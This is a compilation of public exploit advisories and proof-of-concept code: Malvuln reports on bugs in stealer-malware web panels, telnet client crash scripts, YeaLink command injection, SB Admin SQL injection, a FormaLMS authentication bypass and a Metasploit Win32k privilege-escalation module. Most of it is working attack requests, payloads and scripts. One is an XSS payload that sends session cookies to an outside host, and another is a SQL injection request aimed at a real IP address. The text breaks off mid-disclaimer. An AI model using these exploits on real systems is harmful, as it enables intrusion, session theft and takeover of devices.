<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa_C.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Data Deletion<br />Description: The Mars-Stealer web interface has a "Grab Rules" component area that lets a user specify which type of files to collect from a system as specified in the "grab_manual.txt" manual. Third-party attackers who can reach the Mars-Stealer server can send an HTTP POST request to delete any grab rule from the "mars" MySQL database grabrule table.<br /><br />PHP code snippet "markeractions.php"<br /><br />require_once '../../db.php';<br /><br />switch (trim($_POST['func'])) {<br /> case "markeradd":<br /> markeradd();<br /> break;<br /> case "markerdelete":<br /> markerdelete();<br /> break;<br /> case "markeractive":<br /> markeractive();<br /> break;<br />}<br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0453<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />c:/>curl http://MARS_STEALER_SERVER/mars/panel/includes/grabactions.php --data "func=grabdelete&id=1"<br />"deleted"<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-10<br /># Vendor Homepage: https://www.celestialsoftware.net/<br /># Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe<br /># Tested Version: 11.24<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and install AbsoluteTelnet<br /># 2. - Run the python script and it will create exploit.txt file.<br /># 3. - Open AbsoluteTelnet 11.24<br /># 4. - "new connection file -> DialUp Connection<br /># 5. - Paste the characters of txt file to "DialUp -> phone" <br /># 6. - press "ok" button<br /># 7. - Crashed<br /># 8. - Reopen AbsoluteTelnet 11.24<br /># 9. - Copy the same characters to "license name"<br /># 10.- Click "Send Error Report" button<br /># 11.- Crashed<br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 1000<br /><br />try: <br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC not created")<br /> <br /><br />------<br /><br /># Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-10<br /># Vendor Homepage: https://www.celestialsoftware.net/<br /># Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe<br /># Tested Version: 11.24<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and install AbsoluteTelnet<br /># 2. - Run the python script and it will create exploit.txt file.<br /># 3. - Open AbsoluteTelnet 11.24<br /># 4. - "new connection file -> Connection -> SSH1 & SSH2" <br /># 5. - Paste the characters of txt file to "Authentication -> Username" <br /># 6. - press "ok" button<br /># 7. - Crashed<br /># 8. - Reopen AbsoluteTelnet 11.24<br /># 9. - Copy the same characters to "Your Email Address (optional)"<br /># 10.- Click "Send Error Report" button<br /># 11.- Crashed<br /><br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 1000<br /><br />try: <br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC not created")<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Persistent XSS<br />Description: The Mars-Stealer web interface has a "Marker Rules" component area. Third-party attackers who can reach the Mars-Stealer server can send HTTP POST requests injecting arbitrary JS code into the "mars" MySql database in the markerrule table. This results in a persistent cross site scripting condition, executing client side code in the security context of the currently logged on user anytime the WebUI is accessed. This can result in PHPSESSID token and data theft or GEO location disclosure of the user accessing the Mars-Stealer WebUI.<br /><br />PHP code snippet "markeractions.php"<br /><br />require_once '../../db.php';<br /><br />switch (trim($_POST['func'])) {<br /> case "markeradd":<br /> markeradd();<br /> break;<br /> case "markerdelete":<br /> markerdelete();<br /> break;<br /> case "markeractive":<br /> markeractive();<br /> break;<br />}<br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0452<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />curl http://MARS_STEALER/mars/panel/includes/markeractions.php --data "func=markeradd&name=/%3C%3Cscript%3Ealert(document.cookie)%3C/script%3E&marker=WWW.MALVULN.com"<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)<br /># Date: 11-10-2021<br /># Exploit Author: tahaafarooq<br /># Vendor Homepage: https://www.yealink.com/<br /># Version: 53.84.0.15<br /># Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)<br /><br />Description: <br /><br />Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection<br /><br />POC:<br /><br />POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1<br />Host: xxx.xxx.xxx.xxx<br />Content-Length: 49<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />Origin: http://xxx.xxx.xxx.xxx<br />Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: JSESSIONID=9a83d24461329a130<br />Connection: close<br /><br />cmd=; id;&token=1714636915c6acea98<br /><br />-------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html<br />Connection: close<br />Date: Wed, 10 Nov 2021 14:20:23 GMT<br />Server: embed httpd<br />Content-Length: 82<br /><br /><html><br /><body><br /> <div id="_RES_INFO_"><br /> uid=0(root) gid=0(root)<br /> </div><br /></body><br /></html><br /><br /><br /></code></pre>
<pre><code>$$$$$$$\ <br />$$ __$$\ <br />$$ | $$ |$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\ <br />$$$$$$$ |$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ _____|<br />$$ ____/ $$ | $$ | $$ |$$ | $$ | $$$$$$$$ |$$ / <br />$$ | $$ | $$ | $$ |$$ | $$ | $$ ____|$$ | <br />$$ | \$$$$$\$$$$ |$$ | $$ |$$\\$$$$$$$\ \$$$$$$$\ <br />\__| \_____\____/ \__| \__|\__|\_______| \_______|<br />Offensive Security Community [Ecuador]<br /><br /><br />Credits & Authors:<br />==================<br />Taurus Omar - @TaurusOmar_ (whoami@taurusomar) [taurusomar.com]<br /><br />Document Title:<br />===============<br />SB Admin Bootstrap CSRF / Sqli Vulnerability / Bypasss Login Access<br /><br /><br />Severity Level:<br />===============<br />High<br /><br />Google & Bing Dorks<br />===================<br />intitle:SB Admin - login<br />intitle:SB Admin 2 - login<br /><br />Affect<br />===================<br />Araound: 1 Millions of sites<br /><br />Vulnerability Reported Timeline:<br />==================================<br />2021-31-07: Reported<br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-15-01: Public Disclosure<br /><br />Discovery Status:<br />=================<br />Published<br /><br />Affected Product(s):<br />====================<br />SB Admin <br />SB Admin 2<br /><br />Product & Service Introduction:<br />===============================<br />SB Admin, a well-known dashboard template recently migrated to Bootstrap 5. <br />This iconic product comes with minimal custom styling using Google's material <br />design patterns and pre-build pages like a dashboard, charts, data tables, <br />and authentication pages, styles along with a variety of plugins to create a <br />powerful framework for creating admin panels, web apps, or dashboard UI's for <br />your next project. The product uses PUG templates, SCSS and JS scripts for <br />compilation and production build (no Gulp or heavier Webpack). <br /><br />Abstract Advisory Information:<br />==============================<br />An independent researcher discovered Multiple Vulnerabilities in the official aplication SB Admin<br /><br />CSRF Technical Details & Description:<br />=====================================<br />A client-side cross site request forgery vulnerability has been discovered in the official SB Admin control web-application.<br />The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.<br />The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. <br />Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of SB Admin connect service panel staff.The web vulnerability can be exploited by any attackers.<br /><br />Proof video:<br />============<br />https://imgur.com/A6KuhcW<br /><br />Proof of Concept CSRF (PoC-1):<br />==============================<br /><html><br /><body><br /><form action="https://site.com/panel/index.html" method="POST"><br /><div class="form-group"><br /><input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required=""><br /></div><br /><div class="form-group"><br /><input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required=""><br /></div><br /><div class="form-group"><br /></div><br /></div><br /><button type="submit" class="btn btn-primary btn-user btn-block"><br />Login<br /></button><br /></form><br /><br />Proof of Concept CSRF (PoC-2):<br />==============================<br /><html><br /><body><br /><form action="https://site.com/panel/index.php" method="POST"><br /><div class="form-group"><br /><input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required=""><br /></div><br /><div class="form-group"><br /><input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required=""><br /></div><br /><div class="form-group"><br /></div><br /></div><br /><button type="submit" class="btn btn-primary btn-user btn-block"><br />Login<br /></button><br /></form><br /><br /><br />Sqli Technical Details & Description:<br />=====================================<br />The SQL injection attack consists of insertion or “injection” of a SQL query via <br />the input-login data from the client to the application. The successful SQL injection<br />exploit can read sensitive data from the database, modify database data <br />(Insert/Update/Delete), execute administration operations on the database <br />(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system.<br /><br />Proof video:<br />============<br />https://imgur.com/0Z7vtj4<br /><br />Payload:<br />========<br />usuario=§" OR 1 = 1 UNION ALL SELECT CONCAT(0x716b767671,0x677571554f657363504e4974794a7a4a6e43786b727a45514d5146766f6241706a73716e4c527651,0x7178627071),NULL-- - -- -"§&password=§" OR 1 = 1 -- -"§<br /><br />BurpSuite<br />==========<br />POST /requisicao/login.php HTTP/1.1<br />Host: 186.251.225.174<br />Content-Length: 47<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />Origin: http://186.251.225.174<br />Referer: http://186.251.225.174/login.html<br />Accept-Encoding: gzip, deflate<br />Accept-Language: es-CO,es;q=0.9<br />Connection: close<br /><br />usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"<br /><br />Inputs Vulnerabilities<br />======================<br />usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"<br />email=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"<br />username=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"<br />user=" OR 1 = 1 -- -"&pass=" OR 1 = 1 -- -"<br /><br /><br />#######<br />#<br /># Disclaimer:<br /># This or previous programs are for Educational purpose ONLY. Do not use it without permission. <br /># The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages <br /># caused by direct or indirect use of the information or functionality provided by these programs. <br /># The author or any Internet provider bears NO responsibility for content or misuse of these programs <br /># or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, <br /># system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's <br /># responsibility.<br />#<br />#######<br /></code></pre>
<pre><code># Exploit Title: FormaLMS 2.4.4 - Authentication Bypass<br /># Google Dork: inurl:index.php?r=adm/<br /># Date: 2021-11-10<br /># Exploit Author: Cristian 'void' Giustini @ Hacktive Security<br /># Vendor Homepage: https://formalms.org<br /># Software Link: https://formalms.org<br /># Version: <= 2.4.4<br /># Tested on: Linux<br /># CVE : CVE-2021-43136<br /><br /># Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.<br /><br /># Analysis:<br />https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/<br /><br /># Nuclei template:<br />https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml<br /><br />#!/usr/bin/env python<br /><br />"""<br /><br />The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled<br /><br />"""<br /><br />import sys<br />import time<br />import hashlib<br /><br />secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c" <br /><br /> def help():<br /><br /> print(f"Usage: {sys.argv[0]} username target_url")<br /><br /> sys.exit()<br /><br /> <br />if len(sys.argv) < 3:<br /><br /> help()<br /><br />user, url = (sys.argv[1], sys.argv[2])<br />t = str(int(time.time()) + 5000)<br />token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()<br />final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"<br />print(f"URL with default secret: {final_url}")<br />token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()<br />final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"<br />print(f"URL with empty secret: {final_url}")<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Information Disclosure<br />Description: The malware web interface stores screen captures named "screenshot.jpg" in the panel directory, ZIP archived. Third-party attackers who can reach the Mars web server can download any screenshots as no valid session or authentication check is done.<br /><br />view.php PHP code.<br /><br />$z = new ZipArchive();<br />$file ='screenshot.jpg'; <br />$path = $_GET["path"];<br />if ($z->open(realpath($path))) <br />{<br /> $stat = $z->statName($file);<br /> $fp = $z->getStream($file); <br /> <br /> header('Content-Type: image/jpeg'); <br /> header('Content-Length: ' . $stat['size']); <br /> fpassthru($fp); <br />}<br />else<br />{<br /> echo "file not found";<br />}<br /><br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0451<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />curl http://MARSSTEALER_SERVER/mars/panel/view.php?path=screenshot.zip --output screendump.jpg<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Post::File<br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',<br /> 'Description' => %q{<br /> A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by<br /> an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact<br /> that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers<br /> can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object<br /> that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle<br /> with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the<br /> attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the<br /> kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.<br /><br /> This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions<br /> of Windows 10 will likely also work.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'IronHusky', # APT Group who exploited this in the wild<br /> 'Costin Raiu', # Initial reporting on bug at SecureList<br /> 'Boris Larin', # Initial reporting on bug at SecureList<br /> "Red Raindrop Team of Qi'anxin Threat Intelligence Center", # detailed analysis report in Chinese showing how to replicate the vulnerability<br /> 'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763<br /> 'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.<br /> 'Grant Willcox' # metasploit module<br /> ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Platform' => 'win',<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Targets' => [<br /> [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'References' => [<br /> [ 'CVE', '2021-40449' ],<br /> [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation<br /> [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup<br /> [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC<br /> [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.<br /> ],<br /> 'DisclosureDate' => '2021-10-12',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_OS_RESTARTS, ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ],<br /> 'SideEffects' => []<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> sysinfo_value = sysinfo['OS']<br /><br /> if sysinfo_value !~ /windows/i<br /> # Non-Windows systems are definitely not affected.<br /> return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')<br /> end<br /><br /> build_num_raw = cmd_exec('cmd.exe /c ver')<br /> build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)<br /> if build_num.nil?<br /> print_error("Couldn't retrieve the target's build number!")<br /> else<br /> build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]<br /> print_status("Target's build number: #{build_num}")<br /> end<br /><br /> # see https://docs.microsoft.com/en-us/windows/release-information/<br /> unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1809|1903)/<br /> return CheckCode::Safe('Target is not running a vulnerable version of Windows!')<br /> end<br /><br /> build_num_gemversion = Rex::Version.new(build_num)<br /><br /> # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/<br /> if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11<br /> return CheckCode::Appears('Vulnerable Windows 11 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022<br /> return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2<br /> return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1<br /> return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2<br /> return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1<br /> return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909<br /> return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903<br /> return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809<br /> return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803<br /> return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709<br /> return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703<br /> return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607<br /> return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511<br /> return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507<br /> return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2<br /> return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012<br /> return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2<br /> return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2<br /> return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')<br /> else<br /> return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')<br /> end<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br /> elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')<br /> elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64<br /> fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')<br /> end<br /><br /> encoded_payload = payload.encoded<br /> execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),<br /> [encoded_payload.length].pack('I<') + encoded_payload<br /> )<br /><br /> print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/9e44c10307aa8194753896ecf8102167.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ab Stealer Web Panel <br />Vulnerability: Unauthenticated Remote Persistent XSS<br />Description: The "Ab Stealer" web Panel By KingDomSc for "AbBuild v.1.0.exe" is used to browse victim information "Get All Victims Passwords, With One Click". Third-party attackers who can reach the "Ab Stealer" server can write plaintext files to Panel\psw, injecting persistent Cross Site Scripting payloads without the need for authentication. The XSS payloads will execute whenever an "Ab Stealer" admin visits the Web UI or clicks an infected link to view victim information. The sending of HTTP POST requests to POST.php write files "ip-1.txt, ip-2.txt" etc to the "psw" dir. These textfiles typically contain victim information IP, Computername, Country, Date. However, since the PHP code has no security we can inject malicious client side Javascript instead. This can result in data theft and disclosure of the PHPSESSID token or GEO location disclosure for a logged on user of the "Ab Stealer" Web Panel etc.<br /><br />Ab Stealers POST.php file doesn't sanitize input for HTTP GET requests, when writing user supplied data to files to it's "psw" web directory.<br /><br />E.g.<br /><br />if (isset($_GET['online'])) {<br /> $path = 'psw';<br /> $files = array_diff(scandir($path), array('.', '..'));<br /> $CountFiles = count($files) + 1;<br /> $FileName = 'ip-'.$CountFiles.'.txt';<br /> $ip = $_POST['ip'];<br /> $computername = $_POST['computername'];<br /> $installdate = $_POST['installdate'];<br /> $country = $_POST['country'];<br /> $FFD = '{"ip":"'.$ip.'","computername":"'.$computername.'","country":"'.$country.'","date":"'.$installdate.'"}';<br /> $myfile = fopen('psw/'.$FileName, "w") or die("Unable to open file!");<br /> fwrite($myfile, $FFD);<br /> fclose($myfile);<br /> echo $CountFiles;<br />}<br /><br />Moreover, Panel.php doesn't use htmlspecialchars OR htmlentities, to properly escape output when echoing untrusted user supplied data.<br /><br />Type: WebUI<br />MD5: 9e44c10307aa8194753896ecf8102167 (AbBuild v.1.0.exe)<br />MD5: 017925cad9c4eb2c102053cbba04129e (index.php)<br />Vuln ID: MVID-2022-0450<br />Disclosure: 01/15/2022<br /><br /><br />Exploit/PoC:<br />1) Create the psw directory as the Panel setup doesn't create it when installing<br /><br />2) curl.exe http://AB_STEALER_SERVER/Panel/POST.php?online=1 --data "ip=x.x.x.x&computername='%3Cscript%3Ewindow.open('http://malvuln.com/stealsess.php?tok='%2bdocument.cookie)%3C/script%3E&installdate=&country=HELL"<br /><br />3) Visit Ab Stealer Web UI and or click an infected link.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the 